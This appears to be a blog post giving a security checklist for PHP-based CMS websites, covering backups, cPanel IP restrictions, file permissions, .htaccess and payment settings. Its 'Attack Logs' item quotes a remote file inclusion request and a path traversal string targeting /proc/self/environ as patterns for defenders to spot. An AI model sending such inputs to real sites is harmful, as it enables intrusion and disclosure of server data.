Website Security Checklist

Security Checklist for your Website

Here’s the complete Security Checklist for your website. It is valid for websites which use CMSs like Joomla, WordPress or Drupal or any other PHP based CMS.

Beginning with the checklist, let’s talk about first thing first. Always have backups. This is the only fool-proof way to prevent screw-ups. Everything else is secondary. Good Hackers have ways to everything. But it’s not them who create havocs. It’s the wannabe hackers who deface/hack your website. So, essentially, you’re up against these wannabes who can be dangerous at times.

You should make a habit of reviewing your website on a monthly or weekly basis based on this Security checklist. It always helps if you keep yourself updated with security updates to your CMS and the Hosting Control Panel so you could make the required updates to your website on your own without waiting for your developer to do it for you. Be alert! Be very alert!

Alright. So arm yourself with this security checklist and you shall be spared 🙂

  • Nameserver

Make sure Nameserver settings are all working fine. Run a DNS Check for your website. There’re tools like Pingdom and Domaintools to help you do that. Make sure you renew the domain which you are using as your Nameservers. If you fail to renew the Nameserver domain, that would result in shutdown of your other website/s using the same Nameserver.

  • Limit IP Access to your Hosting Control Panel

Limit access to your Hosting Control Panel using IP Access Control. If you’re using cPanel, it comes with the IP Access Control Tool inside Security menu. Simply add the IP addresses which you use for logging into your control panel and set them to allow and the rest IP addresses to deny. That’s it.

  • FTP Server Enable/Disable

If you use cPanel File Manager to manage your files, then it’s recommended to put off FTP server. This, along with the IP Access Control for your cPanel, is the best setting to prevent any unwanted access to your Server. Here’s how you can disable FTP server in WHM: Login to Web Host Manager. Go to FTP Server Selection. There is an option to disable FTP server under FTP Server Selection in Web Host Manager (WHM).

  • Limited IP Access to your Website Backend

Almost all PHP based CMSs have this feature to limit the backend access to selected IP addresses. Joomla has Admin Tools, WordPress has Better WP Security.

  • Super Admin Password changes

Change your Password on a monthly basis. Keep it long and strong. Use alphabets, numeric and characters to create your password.

  • Backups Generated and Segregated

Generate fresh backup every week. Use cPanel’s Backup Wizard to automate the Backup process for complete website of part of it. Keep backups from the past few weeks. Both Offline and Online. Segregate them and prevent direct access to them. If hackers get access to your backup files, that’s catastrophic. Keep backup copies on your PC/Mac in password-protected folders.

  • CMS Version Check

Always use the Latest Stable version of your CMS. Whenever there is an update available for your CMS, make sure you install the update. Please take a backup of your files and database before you perform the update process.

  • File Permissions

Go to File Manager and set Directory permissions to 755, and File permissions to 644.

  • Consider Using PHP open_basedir

You might consider enabling open_basedir. This directive limits the files that can be opened by PHP to the specified directory-tree. This directive is NOT affected by whether Safe Mode is ON or OFF.

  • Attack Logs

A clue to any extensions being targeted is your logs file. Here is an example of what to look for.

//administrator/components/com_extension/admin.extension.php?mosConfig.absolute.path=http:

or

../../../../../../../../../../../../../../../../proc/self/environ

  • Email Settings for your website contacts

Perform weekly checks so as to insure that you have entered correct email addresses to receive messages from your website’s contact form. Sometimes, some wannabe hackers log in to your “insecure” website and change nothing but the email addresses in your contact form and online store. The primary goal of these hackers is to clandestinely collect your enquiries without you knowing about it.

  • Payment Settings for your Products

Be very aware of this. While you do not really expect hackers to do this, some of them do. For the sole purpose of grabbing money from your customers’ transactions. This mostly happens with those who have Paypal Payments enabled as one of their Payment gateways. Hackers hack into your site, change the Paypal Email address to theirs and let the customer transactions go into their account. By the time you realize that, there’s considerable damage already done.

  • Database Username/Password

Change the Database Suffix, Database Username and Database password regularly. Set the Configuration file permission to 444 to prevent any rewriting from the backend in case hacker gets the access to your website.

  • Backend Configuration Settings

Set the site configurations to highest security possible.

  • Online Store Configuration Settings

Set Https for your online store Secure site URL if possible. Enable Encryption for Customers’ Credit card data if you save them to your database. Make your Configuration file Unwriteable from the backend by setting the file permission to 444. Make sure the email address field has your email address for exchanging all the correspondences from your online store.

  • Frontend Editing Access

Disable Frontend editing if you do not need it.

  • .Htaccess for your files

Use .htaccess wherever possible. You can use it to limit direct access to a file or folder or to limit access to a selected pool of IP addresses.  Set your.htaccess file permission to 444.

  • PHP.ini Settings

Implement optimum settings for PHP.ini. Most of the hosting providers already have the best possible security settings in place for their PHP.ini files. But just to be sure, perform a cross-check.

Comments on this post